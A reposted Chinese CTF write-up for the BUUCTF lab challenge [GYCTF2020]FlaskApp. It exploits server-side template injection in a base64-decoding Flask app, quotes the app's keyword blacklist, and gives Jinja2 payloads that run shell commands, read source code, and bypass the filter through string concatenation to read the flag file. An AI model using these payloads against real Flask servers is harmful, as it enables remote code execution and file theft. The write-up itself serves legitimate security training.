其他分享
首页 > 其他分享> > [GYCTF2020]FlaskApp

[GYCTF2020]FlaskApp

作者:互联网

[GYCTF2020]FlaskApp


作者:Hopeace

靶场地址:https://buuoj.cn/challenges#[GYCTF2020]FlaskApp

知识点:Flask模板注入

0x01 浏览题目

题目名字已经明示了这题和Flask模板注入脱不了干系

base64加解密

一个输入框

源代码中有一句比较可疑:这是消息闪现

抓包看一下

没什么异常

session不知道可不可以利用

加密抓个包了解一下,测试原文为123

POST / HTTP/1.1
Host: 9b66f78b-1090-4160-bc8d-1b95461d78a6.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://9b66f78b-1090-4160-bc8d-1b95461d78a6.node4.buuoj.cn:81/
Cookie: session=eyJjc3JmX3Rva2VuIjoiZDY0YWM0YzJhMzQ4MjFiOGNiMDNkODVjZGQ5ODFlOGQwMWQxMTczNCJ9.YWJFyQ.iBI0jbC7eFin1PLn1jVbVO9Sl7w
X-Forwarded-For: 8.8.8.8
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 137

csrf_token=ImQ2NGFjNGMyYTM0ODIxYjhjYjAzZDg1Y2RkOTgxZThkMDFkMTE3MzQi.YWJGIw.b-kRYWBQvycl1X_Fi0dj0CAQdNM&text=123&submit=%E6%8F%90%E4%BA%A4

0x02 分析题目

hint给的是“失败是成功之母”,提示是flask框架下的debug模式

SSTI测试{{7*7}}

加密的窗口生成的base64 并没有计算出49,仍未{{7*7}}的加密形式

而解密的窗口直接报错

是因为base64decode解析错误时会报错

借此查看到部分源码

@app.route('/decode',methods=['POST','GET'])

def decode():

    if request.values.get('text') :

        text = request.values.get("text")

        text_decode = base64.b64decode(text.encode())

        tmp = "结果 : {0}".format(text_decode.decode())

        if waf(tmp) :

            flash("no no no !!")

            return redirect(url_for('decode'))

        res =  render_template_string(tmp)

{{7*7}}加密后e3s3Kjd9fQ==

放到解密框里回显了no no no !!

说明7*7确实被执行了

现在找一下waf函数

又测试了一下

{{7+7}}加密后e3s3Kzd9fQ==

回显了14

好奇怪

0x03 SSTI 测试

// 查看根目录

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}{% endif %}{% endfor %}

被waf检测了,回显nonono

// 读源码去找waf函数

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read()}}{% endif %}{% endfor %}

找到了这段代码

def waf(str):
    black_list = ["flag","os","system","popen","import","eval","chr","request", "subprocess","commands","socket","hex","base64","*","?"]
	for x in black_list : 
             if x in str.lower() :
                  return 1 

应该是过滤了

flag, os, system, popen, import,eval, chr, request, subprocess, commands, socket, hex, base64, * , ?

也解释了7*7被过滤

过滤的都是整个的词,而不是正则匹配,是可以通过字符串拼接绕过的

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}

回显了目录

 ['bin', 'boot', 'dev', 'etc', 'home', 'lib', 'lib64', 'media', 'mnt', 'opt', 'proc', 'root', 'run', 'sbin', 'srv', 'sys', 'tmp', 'usr', 'var', 'this_is_the_flag.txt', '.dockerenv', 'app']

找到了flag的目录

this_is_the_flag.txt

同样对flag进行拼接

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt','r').read()}}{% endif %}{% endfor %}

得到结果flag{dda153d6-c7cb-4106-9fd2-a9f3e740ba1a}

标签:__,39,.__,GYCTF2020,34,&#,__.__,FlaskApp
来源: https://blog.csdn.net/Hopeace/article/details/120770241